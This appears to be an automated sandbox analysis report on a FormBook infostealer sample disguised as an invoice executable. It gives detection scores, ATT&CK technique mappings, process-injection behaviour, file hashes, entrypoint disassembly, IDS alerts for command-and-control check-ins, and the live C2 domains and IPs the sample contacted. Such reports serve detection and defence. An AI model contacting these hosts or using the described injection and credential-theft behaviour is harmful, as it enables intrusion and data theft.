          Source: C:\Users\user\Desktop\INV74321.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 3 | OS Credential Dumping | Security Software Discovery 231 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 512 | Access Token Manipulation 1 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 11 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph

          [Behavior graph. ID: 411840; Sample: INV74321.exe; Startdate: 12/05/2021; Architecture: WINDOWS; Score: 100. Process chain: INV74321.exe -> INV74321.exe -> explorer.exe (injected) -> wlanext.exe -> cmd.exe -> conhost.exe. Dropped file: C:\Users\user\AppData\Local\Temp\...\q7pl.dll, PE32.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          INV74321.exe | 30% | Virustotal |
          INV74321.exe | 18% | Metadefender |
          INV74321.exe | 72% | ReversingLabs | Win32.Trojan.SpyNoon

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll | 26% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll | 55% | ReversingLabs | Win32.Trojan.Pwsx

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.0.INV74321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.2.INV74321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.1.INV74321.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          8.2.wlanext.exe.3ce7960.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          0.2.INV74321.exe.29a0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.INV74321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.INV74321.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          www.downtoearthwork.com | 0% | Virustotal |
          www.shebagholdings.com | 0% | Virustotal |
          www.booweats.com | 0% | Virustotal |
          www.0o-a-8v4l76.net | 0% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains


                              Contacted URLs


                              URLs from Memory and Binaries


                                                        Contacted IPs


                                                        Public


                                                        General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 411840
Start date: 12.05.2021
Start time: 07:34:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 36s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: INV74321.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@16/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 30% (good quality ratio 27.6%)
• Quality average: 75.5%
• Quality standard deviation: 29.7%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 92
• Number of non-executed functions: 59
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs


                                                        Domains

Match: www.downtoearthwork.com
Associated Sample Name / URL: PO09641.exe
Detection: malicious
Context: 172.67.223.227

                                                        ASN

                                                        • 154.95.188.245
                                                        Wire transfer.exeGet hashmaliciousBrowse
                                                        • 156.235.238.98
                                                        DHL Express Service.exeGet hashmaliciousBrowse
                                                        • 154.86.241.165
                                                        NBS11696USPayment.xlsxGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        Shipping Document.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        new order.xlsxGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        GLqbDRKePPp16Zr.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        don.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        DocNo2300058329.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        VIKRAMQST21-222.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        Bank Details Pdf.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        Wire transfer.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        NQ1vVJKBcH.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        A9C9824497908A525A168C43D743FEA3D1F5DC4C3004E.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        Yd7WOb1ksAj378N.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        TT COPY (39.750,00 USD).exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        SWIFT COPY.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111
                                                        1400000004-arrival.exeGet hashmaliciousBrowse
                                                        • 64.190.62.111

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\k0bmhafw06
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):164352
                                                        Entropy (8bit):7.99866949860899
                                                        Encrypted:true
                                                        SSDEEP:3072:hRfkvdzNhJNYNhBR9+T6xzrSSgm/XDQs4JZGbRE1RnW2QnBYYrU1tukIWaXM93:hSvddNYJ+WxzNvDozGbRE1RbQnBYYwK+
                                                        MD5:47632082CDD419FABE009ECFD57523E1
                                                        SHA1:5B1B84805D90C013BE479E90532D413C47A9337F
                                                        SHA-256:22B8E49FC074DCA87B646701C013C3A6337BEF6C6D222D2CA6466289BE2B64CD
                                                        SHA-512:EF2200B4933C491642B308339546B1DC98BC23F45B909339E58D337F1A8A84B7BE7F57B7060159B47A67C4709C83D6574FF2229BE6E3486EFBD1DD81F14C9484
                                                        Malicious:false
                                                        Reputation:low
                                                        C:\Users\user\AppData\Local\Temp\k40o4d06bo6
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6661
                                                        Entropy (8bit):7.969996174404535
                                                        Encrypted:false
                                                        SSDEEP:96:GWc65KZOCmbbSyasSocd7r8R5lFQk+vd2ilwhRMR/t+UdO1lKtnIMzlg+o5:PUtmH/orSjheDlwXMR/tFdO1stn3gt5
                                                        MD5:5ADEB3A9190FFDF42FE06B34B0F68928
                                                        SHA1:2C01B27F4595DEA6E70E733D5C264ABF054C9B9F
                                                        SHA-256:64AFFD574DE23B95A724A54208BD070EF00B2A049FF3A281338987D09F997F5E
                                                        SHA-512:4E398D7EDB98903456267761D0EF23880AEE5EC78A3C9F852480D0B22E90D48CBAC078EA11DF78B0A90BA84ADC03483820299BF475D5E510BC9FD31414A450F6
                                                        Malicious:false
                                                        Reputation:low
                                                        C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dll
                                                        Process:C:\Users\user\Desktop\INV74321.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):4.257823721570018
                                                        Encrypted:false
                                                        SSDEEP:48:iYkYOn1ASkT3Jd95Ei4T53wz4KbCVhbmhnheBKbgXWoqsScz5dXm:ncn1ASkP34V3RKevKcXWoq7cz
                                                        MD5:792AB8BC6ED1C1B28D996EBDC1873E8C
                                                        SHA1:46D80F21EBA3150D206D9BDEF98FACD4867147AC
                                                        SHA-256:575C27017B612C76736D0B43645A8C942477B37BFD5CA34D6D82C004885283C4
                                                        SHA-512:18E7014BDF7264942A62C19A5B155ED5975AB822696CBBF3D9143EC8E2A8AE67569F9B4209CBCECDB6E0740579CBBA41294F89F2493D91D577CC7E01DEB32138
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 26%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                        Reputation:low
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................PE..L....}.`...........!......................... ...............................@....................................... ..T....!....................................... ............................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):5.746555859558499
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:INV74321.exe
                                                        File size:579490
                                                        MD5:877bb5661fe79bb7f48cfb3ea54537a0
                                                        SHA1:dd6b5263da3b4f1a42e89c2c1ade852098561c5d
                                                        SHA256:87935ff36515ecb6a4177c25ad1d11e8d2882aa1c3f369e719406f063a062517
                                                        SHA512:a13e5bab1301b2f716945d526f1e1299b659fd2facb687fe1762348578e3d4a71993e97145481d35399f7fe369def77d5bfd4e32376b78a0116012f6370f8472
                                                        SSDEEP:6144:q9X0G6+bQSvddNYJ+WxzNvDozGbRE1RbQnBYYwKc7:c0f+bQWdNYZZDoGbREfbsuXKa
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                        File Icon

                                                        Icon Hash:e886a37159aadcf8

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403348
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:ced282d9b261d1462772017fe2f6972b

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 0040A198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B8h]
                                                        call dword ptr [004080BCh]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F42Ch], eax
                                                        je 00007F6884AB8B33h
                                                        push ebx
                                                        call 00007F6884ABBC96h
                                                        cmp eax, ebx
                                                        je 00007F6884AB8B29h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007F6884ABBC12h
                                                        push esi
                                                        call dword ptr [004080CCh]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F6884AB8B0Dh
                                                        push 0000000Bh
                                                        call 00007F6884ABBC6Ah
                                                        push 00000009h
                                                        call 00007F6884ABBC63h
                                                        push 00000007h
                                                        mov dword ptr [0042F424h], eax
                                                        call 00007F6884ABBC57h
                                                        cmp eax, ebx
                                                        je 00007F6884AB8B31h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F6884AB8B29h
                                                        or byte ptr [0042F42Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F4F8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429850h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A188h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x5add0 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                        Sections

                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x6457 | 0x6600 | False | 0.66823682598 | data | 6.43498570321 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x8000 | 0x1380 | 0x1400 | False | 0.4625 | data | 5.26100389731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0xa000 | 0x25538 | 0x600 | False | 0.463541666667 | data | 4.133728555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0x38000 | 0x5add0 | 0x5ae00 | False | 0.0560468964924 | data | 3.59489590651 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        Name | RVA | Size | Type | Language | Country
                                                        RT_ICON | 0x38280 | 0x42028 | data | English | United States
                                                        RT_ICON | 0x7a2a8 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
                                                        RT_ICON | 0x8aad0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x8ecf8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x912a0 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x92348 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                                        RT_DIALOG | 0x927b0 | 0x100 | data | English | United States
                                                        RT_DIALOG | 0x928b0 | 0x11c | data | English | United States
                                                        RT_DIALOG | 0x929d0 | 0x60 | data | English | United States
                                                        RT_GROUP_ICON | 0x92a30 | 0x5a | data | English | United States
                                                        RT_MANIFEST | 0x92a90 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                        Imports

                                                        DLL | Import
                                                        ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                        SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                        ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                        COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                        GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                        Possible Origin

                                                        Language of compilation system | Country where language is spoken
                                                        English | United States

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                        05/12/21-07:36:20.954955 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.3 | 8.8.8.8
                                                        05/12/21-07:36:21.998903 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.3 | 8.8.8.8
                                                        05/12/21-07:36:25.546082 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        05/12/21-07:36:25.546082 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        05/12/21-07:36:25.546082 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 119.18.54.126
                                                        05/12/21-07:36:31.764293 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        05/12/21-07:36:31.764293 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        05/12/21-07:36:31.764293 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 163.43.122.109
                                                        05/12/21-07:36:37.560160 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        05/12/21-07:36:37.560160 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        05/12/21-07:36:37.560160 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49734 | 80 | 192.168.2.3 | 104.21.46.55
                                                        05/12/21-07:36:58.988852 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        05/12/21-07:36:58.988852 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        05/12/21-07:36:58.988852 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 64.190.62.111
                                                        05/12/21-07:37:04.217828 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        05/12/21-07:37:04.217828 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        05/12/21-07:37:04.217828 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.3 | 34.102.136.180
                                                        05/12/21-07:37:04.354921 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49741 | 34.102.136.180 | 192.168.2.3


                                                        TCP Packets


                                                        UDP Packets


                                                        ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 12, 2021 07:36:20.954955101 CEST | 192.168.2.3 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable
May 12, 2021 07:36:21.998903036 CEST | 192.168.2.3 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable

                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2021 07:36:15.867855072 CEST | 192.168.2.3 | 8.8.8.8 | 0xbfe0 | Standard query (0) | www.aqayeseo.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:16.878719091 CEST | 192.168.2.3 | 8.8.8.8 | 0xbfe0 | Standard query (0) | www.aqayeseo.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:17.926945925 CEST | 192.168.2.3 | 8.8.8.8 | 0xbfe0 | Standard query (0) | www.aqayeseo.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:24.963274956 CEST | 192.168.2.3 | 8.8.8.8 | 0x6b2d | Standard query (0) | www.king-jackpot.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:30.845324039 CEST | 192.168.2.3 | 8.8.8.8 | 0x2265 | Standard query (0) | www.0o-a-8v4l76.net | A (IP address) | IN (0x0001)
May 12, 2021 07:36:37.451916933 CEST | 192.168.2.3 | 8.8.8.8 | 0xfb14 | Standard query (0) | www.downtoearthwork.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:42.629811049 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a0d | Standard query (0) | www.smartmatch-dating-api.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:47.814141989 CEST | 192.168.2.3 | 8.8.8.8 | 0xad70 | Standard query (0) | www.topcasino-111.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:52.997044086 CEST | 192.168.2.3 | 8.8.8.8 | 0xd165 | Standard query (0) | www.shebagholdings.com | A (IP address) | IN (0x0001)
May 12, 2021 07:36:58.871206999 CEST | 192.168.2.3 | 8.8.8.8 | 0xaaaa | Standard query (0) | www.booweats.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:04.112806082 CEST | 192.168.2.3 | 8.8.8.8 | 0x4ec2 | Standard query (0) | www.xn--espacesacr-k7a.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:09.665203094 CEST | 192.168.2.3 | 8.8.8.8 | 0x451d | Standard query (0) | www.lingoblasterdiscount.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:14.744381905 CEST | 192.168.2.3 | 8.8.8.8 | 0xe832 | Standard query (0) | www.painteredmond.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:20.276674986 CEST | 192.168.2.3 | 8.8.8.8 | 0x8d20 | Standard query (0) | www.cylindberg.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:21.290323019 CEST | 192.168.2.3 | 8.8.8.8 | 0x8d20 | Standard query (0) | www.cylindberg.com | A (IP address) | IN (0x0001)
May 12, 2021 07:37:22.305836916 CEST | 192.168.2.3 | 8.8.8.8 | 0x8d20 | Standard query (0) | www.cylindberg.com | A (IP address) | IN (0x0001)

                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2021 07:36:19.941365004 CEST | 8.8.8.8 | 192.168.2.3 | 0xbfe0 | Server failure (2) | www.aqayeseo.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:36:20.953538895 CEST | 8.8.8.8 | 192.168.2.3 | 0xbfe0 | Server failure (2) | www.aqayeseo.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:36:21.998647928 CEST | 8.8.8.8 | 192.168.2.3 | 0xbfe0 | Server failure (2) | www.aqayeseo.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:36:25.373923063 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b2d | No error (0) | www.king-jackpot.com | king-jackpot.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 07:36:25.373923063 CEST | 8.8.8.8 | 192.168.2.3 | 0x6b2d | No error (0) | king-jackpot.com |  | 119.18.54.126 | A (IP address) | IN (0x0001)
